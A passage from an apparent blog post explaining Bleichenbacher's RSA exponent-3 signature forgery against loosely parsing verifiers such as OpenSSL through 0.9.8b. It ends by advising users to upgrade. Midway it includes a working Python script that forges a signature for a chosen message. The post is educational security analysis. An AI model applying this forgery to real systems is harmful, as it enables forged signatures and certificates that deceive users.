For some RSA implementations, this could be an acceptable message layout. It’s semantically invalid, but can appear syntactically valid. And if you don’t completely unpack and check all the metadata in the signature, well, this can happen:

  1. Determine the padding from the fixed header bytes.
  2. Scan until the terminator.
  3. Scoop out the hash information.
  4. Use the hash to confirm you’re looking at the same message that the “signer” signed.
  5. Use the signature to confirm that a real “signer” signed it.

The problem is that this attack breaks the connection between (4) and (5). The hash, now “centered” instead of “right-justified”, doesn’t really mean anything, because the signature covers a bunch more bits.

This is all trivia without some value for “evil” that lets you substitute an arbitrary message hash (and thus an arbitrary message) into an otherwise valid-looking signature. Enter Bleichenbacher’s attack.

RSA takes parameters, one of which is a “public exponent”, which is part of the public key. If that exponent is “3”, which it often is, an attacker can exploit broken signature validation code to forge messages. The math here, which Bleichenbacher claims is simple enough to do with a pencil and paper, gets a bit hairy for me (I lose it at polynomials). Dino explains it better than I do. The long and the short of it is, you validate an RSA signature by computing:

s ^ e = m (mod n)

(where “e” is the public exponent, “n” is the public modulus, and “s” is the signature) and verifying that you get the same result as applying steps (1) and (2) from the signature process yourself. But:

  1. If the public exponent is “3”, and
  2. you inject the right “evil” bits into the PKCS data to make it a perfect cube, then
  3. you can create something that broken RSA will validate.
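A toy version of the e = 3 forgery, needing no private key at all (my sketch, not Bleichenbacher's exact construction): put the block you want the verifier to see at the top, leave the tail free for garbage, and take an integer cube root. A verifier that stops checking after the hash will accept s, because s**3 reproduces the chosen prefix:

```python
import hashlib

SHA1_PREFIX = bytes.fromhex("3021300906052b0e03021a05000414")

def icbrt(n: int) -> int:
    """Floor of the integer cube root, by binary search."""
    lo, hi = 0, 1 << (n.bit_length() // 3 + 2)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** 3 <= n:
            lo = mid
        else:
            hi = mid - 1
    return lo

def forge(message: bytes, em_len: int = 384) -> int:
    """Return s such that s**3, as bytes, starts with a valid-looking
    00 01 FF 00 || DigestInfo, with whatever garbage in the low bytes."""
    di = SHA1_PREFIX + hashlib.sha1(message).digest()
    prefix = b"\x00\x01\xff\x00" + di
    garbage_bits = 8 * (em_len - len(prefix))
    target = int.from_bytes(prefix, "big") << garbage_bits
    s = icbrt(target) + 1                          # round up: s**3 >= target
    assert s ** 3 < target + (1 << garbage_bits)   # rounding error fits in the garbage
    return s

msg = b"pay the attacker"
s = forge(msg)
# For a 3072-bit modulus, s**3 < n, so the mod-n reduction never kicks in.
em = (s ** 3).to_bytes(384, "big")
di = SHA1_PREFIX + hashlib.sha1(msg).digest()
assert em[:4] == b"\x00\x01\xff\x00" and em[4:4 + len(di)] == di
```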

Good technical details in Hal Finney’s OpenPGP post (OpenPGP is not vulnerable). And a security advisory for OpenSSL (OpenSSL is vulnerable, through 0.9.8b).

Two things have gone wrong here:

  1. Implementations misparse signatures, assuming that a syntactically valid-looking hash is semantically operative.
  2. For the common RSA exponent parameter “3”, there’s a straightforward way to manipulate a bogus signature to make it look valid.

My understanding is, the demonstrated attack sticks the evil bits outside of the DigestInfo (the hash data). The way I see the bug being described, broken implementations are just scanning the buffer without “fully decoding it”, implying that if they just validated the ASN.1 metadata against the signature buffer they’d be OK. That may be true, but it seems possible that a blind “memcmp” on an over-long SHA1 octet string, which would be ASN.1-valid and leave the Digest at the end of the buffer, could also trigger the same bug.

This is only a problem if:

  1. You’re running broken code
  2. You’re relying on certificate validation
  3. The certificates you’re validating use an exponent of “3”

Unfortunately, although the default for OpenSSL is “65537” (no practical attack known for that), “3” is a common alternative: it’s faster, especially in embedded environments. Ferguson and Schneier recommend it in Practical Cryptography. Checking the CA bundle for “curl”:

cat curl-ca-bundle.crt | grep Exponent | grep ": 3" | wc -l

gives 6 hits, from Digital Signature Trust Co. Those same certs are in Firefox. Firefox doesn’t use OpenSSL; it uses NSS, and I don’t know if NSS is vulnerable. Here’s the code. I see it extracting a SHA1 hash’s worth of data, and don’t see it checking to make sure that data exhausts the buffer, but I don’t know the code well. Safari also depends on OpenSSL.

Correct me on any of these points and I’ll amend the post. I haven’t tested this (although Google Security did a proof of concept against OpenSSL that precipitated the advisory).

You should upgrade to the most recent OpenSSL. Bleichenbacher also recommended people stop using signing keys with a “3” exponent.